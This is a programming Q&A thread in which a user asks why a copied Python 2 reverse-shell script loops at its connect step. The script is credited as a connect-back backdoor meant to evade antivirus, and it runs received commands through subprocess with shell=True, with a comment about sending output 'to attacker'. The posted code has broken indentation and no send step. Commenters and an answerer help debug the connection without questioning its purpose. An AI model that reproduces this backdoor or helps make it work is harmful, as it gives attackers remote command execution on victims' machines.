# Why does this code keep looping on the first 12 lines of coding?

Tags: python, loops, execute

(Just assume that all of the indents and whitespace is correct)

```
#! /usr/bin/env python

# Copyright (c) 2011 Xavier Garcia www.shellguardians.com
# All rights reserved.

#  Based on the Python connect back shell written by David Kennedy
#  http://www.secmaniac.com/june-2011/creating-a-13-line-backdoor-worry-free-of-av/

# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
#    notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
#    notice, this list of conditions and the following disclaimer in the
#    documentation and/or other materials provided with the distribution.
# 3. Neither the name of copyright holders nor the names of its
#    contributors may be used to endorse or promote products derived
#    from this software without specific prior written permission.
# 
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL COPYRIGHT HOLDERS OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.


import socket

import subprocess

import sys

import time

HOST = '127.0.0.1'    
PORT = 8080           
print "Starting Listener and Reverse Shell proccess."



def connect((host, port)):

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print "Okay #1"
    s.connect((host, port))
    print "Accessing..."
    return s

def wait_for_command(s):

    data = s.recv(1024)
    print "Phase three, completed"
    if data == "quit\n":
        s.close()
    sys.exit(0)
    print "Socket Closed. Unable to boot."
    # the socket died
    elif len(data)==0:
        return True
    else:
    # do shell command
    proc = subprocess.Popen(data, shell=True,
             stdout=subprocess.PIPE, stderr=subprocess.PIPE,
         stdin=subprocess.PIPE)
        # read output
        stdout_value = proc.stdout.read() + proc.stderr.read()
        # send output to attacker
        print "I think this worked..."
        return False

def main():

    while True:
        socked_died=False
        try:
            s=connect((HOST,PORT))
            while not socked_died:
                socked_died=wait_for_command(s)
            s.close()
        except socket.error:
            pass
        time.sleep(5)

if __name__ == "__main__":

    sys.exit(main())
```

This code keeps looping up until it says print "Okay #1". It doesn't seem to move on to the other code lines. I first tried to make this kind of script myself but kept failing so I went to the internet for help. this code took a while to execute so I put print scripts so I can see if this is working properly.

Comment: `try... except ... pass` in a `while True` loop maybe? Especially if you don't see any `"Accessing..."` output...

Comment: Please fix your indentation. Also, _dont_ silently pass `socket.error``- at least log them.

Comment: perhaps you shouldn't have a function with the same name as a socket method('connect'). You call s.connect() from within the connect function.

Answer (score 0):

Your connect method is throwing an exception when calling `s.connect((host,port))`. It prints "Okay #1" but then the next line blows up. So, then it jumps to your `except socket.error` block and calls `pass`. It then sleeps for 5ms and then tries all over again, resulting in the same exact thing.

Can you find out what the socket.error is and log it?

Perhaps you can try this (this is based on this [link](http://ilab.cs.byu.edu/python/socket/exceptions.html)):

```
while True:
    socked_died=False
    try:
        s=connect((HOST,PORT))
        while not socked_died:
            socked_died=wait_for_command(s)
        s.close()
    except socket.error, (value,message): 
        if s: 
            s.close() 
        print "Could not open socket: " + message 
        sys.exit(1) 
    time.sleep(5)
```

Comment: I don't really know how to find out what the socket.error is and log it. Can you tell me how I would do that?

Comment: @user3132831 you can try my updated code and let me know if that works.

Comment: I put in the while True: script you gave me and now I get a syntax error saying Syntax Error: 'break' outside loop

Comment: @user3132831 sorry, my python is a bit rusty. What happens if you try raise socket.error instead of break?

Comment: That got rid of the Syntax error. But it doesn't seem to move on from print "Starting Listener and Reverse Shell process." or atleast that's what the output shows

Comment: @user3132831 Ok, try my current update. That was based on this: http://ilab.cs.byu.edu/python/socket/exceptions.html

Comment: I tried the current update and at first it gave an indentation error for socket_died=False, so I moved it to line up with While not socke_died: to see if it would do anything. It gave another indentation error so I moved it back. And it worked but again it still only prints out "Starting Listener and Reverse Shell process."